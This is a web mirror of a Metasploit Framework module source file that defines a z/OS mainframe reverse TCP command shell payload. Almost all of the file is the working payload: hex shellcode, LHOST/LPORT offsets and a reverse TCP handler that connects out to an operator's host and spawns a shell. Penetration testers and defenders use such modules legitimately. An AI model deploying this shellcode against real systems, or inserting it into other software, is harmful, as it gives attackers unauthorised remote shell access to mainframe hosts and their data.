CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/mainframe/shell_reverse_tcp.rb
Views: 11766
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
# This payload has no ebcdic<->ascii translator built in.

5
# Therefore it must use a shell which does, like mainframe_shell

6
#

7
#

8
##

9


10


11
module MetasploitModule

12
  CachedSize = 339

13


14
  include Msf::Payload::Single

15
  include Msf::Payload::Mainframe

16
  include Msf::Sessions::CommandShellOptions

17


18
  def initialize(info = {})

19
    super(merge_info(info,

20
      'Name'          => 'Z/OS (MVS) Command Shell, Reverse TCP Inline',

21
      'Description'   => 'Listen for a connection and spawn a command shell.

22
          This implementation does not include ebcdic character translation,

23
          so a client with translation capabilities is required.  MSF handles

24
          this automatically.',

25
      'Author'        => 'Bigendian Smalls',

26
      'License'       => MSF_LICENSE,

27
      'Platform'      => 'mainframe',

28
      'Arch'          => ARCH_ZARCH,

29
      'Handler'       => Msf::Handler::ReverseTcp,

30
      'Session'       => Msf::Sessions::MainframeShell,

31
      'Payload'       =>

32
        {

33
          'Offsets' =>

34
            {

35
              'LPORT' => [ 321, 'n'    ],

36
              'LHOST' => [ 323, 'ADDR' ]

37
            },

38
          'Payload' =>

39
            "\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" \

40
            "\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" \

41
            "\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" \

42
            "\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" \

43
            "\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" \

44
            "\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" \

45
            "\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" \

46
            "\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" \

47
            "\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" \

48
            "\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" \

49
            "\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" \

50
            "\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" \

51
            "\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" \

52
            "\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" \

53
            "\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" \

54
            "\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" \

55
            "\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" \

56
            "\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" \

57
            "\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" \

58
            "\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" \

59
            "\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" \

60
            "\x61\xa2\x88"

61
        }))

62
  end

63
end

64


65